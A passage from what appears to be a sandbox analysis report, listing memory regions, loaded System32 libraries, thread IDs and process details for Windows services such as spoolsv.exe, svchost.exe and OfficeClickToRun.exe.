"\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4724 start_va = 0x7ff85a3c0000 end_va = 0x7ff85a402fff monitored = 0 entry_point = 0x7ff85a3d4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 4725 start_va = 0x7ff85a530000 end_va = 0x7ff85a537fff monitored = 0 entry_point = 0x7ff85a531ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4726 start_va = 0x7ff85bcb0000 end_va = 0x7ff85be05fff monitored = 0 entry_point = 0x7ff85bcba8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4727 start_va = 0x7ff85bea0000 end_va = 0x7ff85bfbbfff monitored = 0 entry_point = 0x7ff85bee02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4728 start_va = 0x7ff85bfd0000 end_va = 0x7ff85c076fff monitored = 0 entry_point = 0x7ff85bfe58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4729 start_va = 0x7ff85c080000 end_va = 0x7ff85c126fff monitored = 0 entry_point = 0x7ff85c08b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4730 start_va = 0x7ff85c130000 end_va = 0x7ff85c1f0fff monitored = 0 entry_point = 0x7ff85c150da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4731 start_va = 0x7ff85c360000 end_va = 0x7ff85c3fcfff monitored = 0 entry_point = 0x7ff85c3678a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4732 start_va = 0x7ff85c560000 end_va = 0x7ff85c6e5fff monitored = 0 entry_point = 0x7ff85c5affc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4733 start_va = 0x7ff85cb80000 end_va = 0x7ff85cc2cfff monitored = 0 entry_point = 0x7ff85cb981a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4734 start_va = 0x7ff85cc30000 end_va = 0x7ff85cc8afff monitored = 0 entry_point = 0x7ff85cc438b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4735 start_va = 0x7ff85cc90000 end_va = 0x7ff85cf0cfff monitored = 0 entry_point = 0x7ff85cd64970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 4736 start_va = 0x7ff85cf10000 end_va = 0x7ff85cf7afff monitored = 0 entry_point = 0x7ff85cf290c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4737 start_va = 0x7ff85d0d0000 end_va = 0x7ff85d290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4905 start_va = 0x4710000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004710000" filename = "" Region: id = 4906 start_va = 0x7ff841670000 end_va = 0x7ff841774fff monitored = 0 entry_point = 0x7ff8416a4b00 region_type = mapped_file name = "termsrv.dll" filename = "\\Windows\\System32\\termsrv.dll" (normalized: "c:\\windows\\system32\\termsrv.dll") Region: id = 4978 start_va = 0x4810000 end_va = 0x490ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Thread: id = 439 os_tid = 0x900 Thread: id = 440 os_tid = 0xe70 Thread: id = 441 os_tid = 0x764 Thread: id = 442 os_tid = 0x658 Thread: id = 443 os_tid = 0x580 Thread: id = 444 os_tid = 0x6c0 Thread: id = 445 os_tid = 0x58c Thread: id = 446 os_tid = 0x584 Thread: id = 447 os_tid = 0x578 Thread: id = 448 os_tid = 0x568 Thread: id = 449 os_tid = 0x560 Thread: id = 450 os_tid = 0x55c Thread: id = 451 os_tid = 0x51c Thread: id = 452 os_tid = 0x4e8 Thread: id = 453 os_tid = 0x4e4 Thread: id = 454 os_tid = 0x4e0 Thread: id = 455 os_tid = 0x4dc Thread: id = 456 os_tid = 0x4d8 Thread: id = 457 os_tid = 0x4b8 Thread: id = 458 os_tid = 0x4ac Thread: id = 459 os_tid = 0x4a0 Thread: id = 460 os_tid = 0x460 Thread: id = 521 os_tid = 0xdb0 Thread: id = 523 os_tid = 0xdd0 Process: id = "34" image_name = "spoolsv.exe" filename = "c:\\windows\\system32\\spoolsv.exe" page_root = "0x3565b000" os_pid = "0x4c8" os_integrity_level = "0x4000" os_privileges = "0x20a00080" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x214" cmd_line = "C:\\Windows\\System32\\spoolsv.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Spooler" [0xe], "NT AUTHORITY\\Logon Session 00000000:00011078" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 3878 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3879 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3880 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3881 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 3882 start_va = 0x90000 end_va = 0x93fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 3883 start_va = 0xa0000 end_va = 0xa0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 3884 start_va = 0xb0000 end_va = 0xb1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 3885 start_va = 0xc0000 end_va = 0xc1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 3886 start_va = 0xd0000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 3887 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 3888 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 3889 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 3890 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3891 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3892 start_va = 0x500000 end_va = 0x687fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 3893 start_va = 0x690000 end_va = 0x810fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 3894 start_va = 0x820000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 3895 start_va = 0x8e0000 end_va = 0xcdafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 3896 start_va = 0xce0000 end_va = 0xce6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 3897 start_va = 0xcf0000 end_va = 0xd2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 3898 start_va = 0xd30000 end_va = 0xd6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d30000" filename = "" Region: id = 3899 start_va = 0xd70000 end_va = 0xd70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d70000" filename = "" Region: id = 3900 start_va = 0xd80000 end_va = 0xdbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d80000" filename = "" Region: id = 3901 start_va = 0xdc0000 end_va = 0xdfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 3902 start_va = 0xe00000 end_va = 0xe3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 3903 start_va = 0xe40000 end_va = 0xe7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e40000" filename = "" Region: id = 3904 start_va = 0xe80000 end_va = 0xe8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 3905 start_va = 0xe90000 end_va = 0xf8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 3906 start_va = 0x1060000 end_va = 0x106ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001060000" filename = "" Region: id = 3907 start_va = 0x1070000 end_va = 0x13a6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3908 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3909 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 3910 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 3911 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 3912 start_va = 0x7ff7654a0000 end_va = 0x7ff76555dfff monitored = 0 entry_point = 0x7ff7654c2340 region_type = mapped_file name = "spoolsv.exe" filename = "\\Windows\\System32\\spoolsv.exe" (normalized: "c:\\windows\\system32\\spoolsv.exe") Region: id = 3913 start_va = 0x7ff841780000 end_va = 0x7ff841896fff monitored = 0 entry_point = 0x7ff8417d55b0 region_type = mapped_file name = "localspl.dll" filename = "\\Windows\\System32\\localspl.dll" (normalized: "c:\\windows\\system32\\localspl.dll") Region: id = 3914 start_va = 0x7ff84b920000 end_va = 0x7ff84b9a3fff monitored = 0 entry_point = 0x7ff84b932830 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 3915 start_va = 0x7ff84d2f0000 end_va = 0x7ff84d315fff monitored = 0 entry_point = 0x7ff84d2f1cf0 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 3916 start_va = 0x7ff84db40000 end_va = 0x7ff84db53fff monitored = 0 entry_point = 0x7ff84db43990 region_type = mapped_file name = "printisolationproxy.dll" filename = "\\Windows\\System32\\PrintIsolationProxy.dll" (normalized: "c:\\windows\\system32\\printisolationproxy.dll") Region: id = 3917 start_va = 0x7ff84db60000 end_va = 0x7ff84db70fff monitored = 0 entry_point = 0x7ff84db63e10 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 3918 start_va = 0x7ff84f1d0000 end_va = 0x7ff84f1ebfff monitored = 0 entry_point = 0x7ff84f1d3c20 region_type = mapped_file name = "spoolss.dll" filename = "\\Windows\\System32\\spoolss.dll" (normalized: "c:\\windows\\system32\\spoolss.dll") Region: id = 3919 start_va = 0x7ff8502c0000 end_va = 0x7ff8502cbfff monitored = 0 entry_point = 0x7ff8502c35c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 3920 start_va = 0x7ff851d40000 end_va = 0x7ff851d49fff monitored = 0 entry_point = 0x7ff851d414c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 3921 start_va = 0x7ff8527b0000 end_va = 0x7ff852816fff monitored = 0 entry_point = 0x7ff8527b63e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3922 start_va = 0x7ff852880000 end_va = 0x7ff85288afff monitored = 0 entry_point = 0x7ff852881d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 3923 start_va = 0x7ff852960000 end_va = 0x7ff852997fff monitored = 0 entry_point = 0x7ff852978cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 3924 start_va = 0x7ff857e00000 end_va = 0x7ff857e12fff monitored = 0 entry_point = 0x7ff857e02760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 3925 start_va = 0x7ff858160000 end_va = 0x7ff858209fff monitored = 0 entry_point = 0x7ff858187910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 3926 start_va = 0x7ff858fc0000 end_va = 0x7ff85901bfff monitored = 0 entry_point = 0x7ff858fd6f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 3927 start_va = 0x7ff859020000 end_va = 0x7ff859075fff monitored = 0 entry_point = 0x7ff859030bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 3928 start_va = 0x7ff8593d0000 end_va = 0x7ff8593fcfff monitored = 0 entry_point = 0x7ff8593e9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3929 start_va = 0x7ff859580000 end_va = 0x7ff8595a8fff monitored = 0 entry_point = 0x7ff859594530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 3930 start_va = 0x7ff8596f0000 end_va = 0x7ff8596fffff monitored = 0 entry_point = 0x7ff8596f56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 3931 start_va = 0x7ff859720000 end_va = 0x7ff85972efff monitored = 0 entry_point = 0x7ff859723210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 3932 start_va = 0x7ff859730000 end_va = 0x7ff85977afff monitored = 0 entry_point = 0x7ff8597335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 3933 start_va = 0x7ff859850000 end_va = 0x7ff859a16fff monitored = 0 entry_point = 0x7ff8598adb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 3934 start_va = 0x7ff859a20000 end_va = 0x7ff859c07fff monitored = 0 entry_point = 0x7ff859a4ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3935 start_va = 0x7ff85a2c0000 end_va = 0x7ff85a329fff monitored = 0 entry_point = 0x7ff85a2f6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 3936 start_va = 0x7ff85a3c0000 end_va = 0x7ff85a402fff monitored = 0 entry_point = 0x7ff85a3d4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 3937 start_va = 0x7ff85a530000 end_va = 0x7ff85a537fff monitored = 0 entry_point = 0x7ff85a531ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3938 start_va = 0x7ff85bcb0000 end_va = 0x7ff85be05fff monitored = 0 entry_point = 0x7ff85bcba8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3939 start_va = 0x7ff85bea0000 end_va = 0x7ff85bfbbfff monitored = 0 entry_point = 0x7ff85bee02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3940 start_va = 0x7ff85bfd0000 end_va = 0x7ff85c076fff monitored = 0 entry_point = 0x7ff85bfe58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3941 start_va = 0x7ff85c360000 end_va = 0x7ff85c3fcfff monitored = 0 entry_point = 0x7ff85c3678a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3942 start_va = 0x7ff85c410000 end_va = 0x7ff85c552fff monitored = 0 entry_point = 0x7ff85c438210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3943 start_va = 0x7ff85c560000 end_va = 0x7ff85c6e5fff monitored = 0 entry_point = 0x7ff85c5affc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3944 start_va = 0x7ff85c6f0000 end_va = 0x7ff85cb18fff monitored = 0 entry_point = 0x7ff85c718740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 3945 start_va = 0x7ff85cb80000 end_va = 0x7ff85cc2cfff monitored = 0 entry_point = 0x7ff85cb981a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3946 start_va = 0x7ff85cc30000 end_va = 0x7ff85cc8afff monitored = 0 entry_point = 0x7ff85cc438b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3947 start_va = 0x7ff85cc90000 end_va = 0x7ff85cf0cfff monitored = 0 entry_point = 0x7ff85cd64970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3948 start_va = 0x7ff85cf10000 end_va = 0x7ff85cf7afff monitored = 0 entry_point = 0x7ff85cf290c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3949 start_va = 0x7ff85d0d0000 end_va = 0x7ff85d290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4738 start_va = 0x7ff84db20000 end_va = 0x7ff84db30fff monitored = 0 entry_point = 0x7ff84db215f0 region_type = mapped_file name = "fxsmon.dll" filename = "\\Windows\\System32\\FXSMON.dll" (normalized: "c:\\windows\\system32\\fxsmon.dll") Region: id = 4904 start_va = 0x7ff84d270000 end_va = 0x7ff84d2a9fff monitored = 0 entry_point = 0x7ff84d2730b0 region_type = mapped_file name = "tcpmon.dll" filename = "\\Windows\\System32\\tcpmon.dll" (normalized: "c:\\windows\\system32\\tcpmon.dll") Region: id = 4938 start_va = 0x7ff84f1c0000 end_va = 0x7ff84f1cbfff monitored = 0 entry_point = 0x7ff84f1c1400 region_type = mapped_file name = "snmpapi.dll" filename = "\\Windows\\System32\\snmpapi.dll" (normalized: "c:\\windows\\system32\\snmpapi.dll") Region: id = 4977 start_va = 0x7ff84c270000 end_va = 0x7ff84c283fff monitored = 0 entry_point = 0x7ff84c2718e0 region_type = mapped_file name = "wsnmp32.dll" filename = "\\Windows\\System32\\wsnmp32.dll" (normalized: "c:\\windows\\system32\\wsnmp32.dll") Region: id = 5007 start_va = 0x7ff842690000 end_va = 0x7ff8426dffff monitored = 0 entry_point = 0x7ff842693340 region_type = mapped_file name = "usbmon.dll" filename = "\\Windows\\System32\\usbmon.dll" (normalized: "c:\\windows\\system32\\usbmon.dll") Thread: id = 461 os_tid = 0xdd4 Thread: id = 462 os_tid = 0x5a8 Thread: id = 463 os_tid = 0x52c Thread: id = 464 os_tid = 0x528 Thread: id = 465 os_tid = 0x518 Thread: id = 466 os_tid = 0x4f8 Thread: id = 467 os_tid = 0x4cc Process: id = "35" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4d762000" os_pid = "0x53c" os_integrity_level = "0x4000" os_privileges = "0x20b00080" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x214" cmd_line = "C:\\Windows\\system32\\svchost.exe -k WbioSvcGroup" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 468 os_tid = 0xb80 Thread: id = 469 os_tid = 0x76c Thread: id = 470 os_tid = 0x550 Thread: id = 471 os_tid = 0x54c Thread: id = 472 os_tid = 0x548 Thread: id = 473 os_tid = 0x540 Process: id = "36" image_name = "officeclicktorun.exe" filename = "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe" page_root = "0x3497d000" os_pid = "0x5e0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x214" cmd_line = "\"C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe\" /service" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 5037 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5038 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5039 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5040 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 5041 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 5042 start_va = 0x160000 end_va = 0x162fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 5043 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 5044 start_va = 0x180000 end_va = 0x186fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 5045 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 5046 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 5047 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 5048 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 5049 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5050 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 5051 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 5052 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 5053 start_va = 0x400000 end_va = 0x401fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5054 start_va = 0x410000 end_va = 0x411fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 5055 start_va = 0x420000 end_va = 0x421fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 5056 start_va = 0x430000 end_va = 0x430fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 5057 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 5058 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 5059 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 5060 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 5061 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 5062 start_va = 0x490000 end_va = 0x490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 5063 start_va = 0x4a0000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 5064 start_va = 0x5a0000 end_va = 0x65dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5065 start_va = 0x660000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 5066 start_va = 0x670000 end_va = 0x670fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 5067 start_va = 0x680000 end_va = 0x684fff monitored = 0 entry_point = 0x0 region_type = 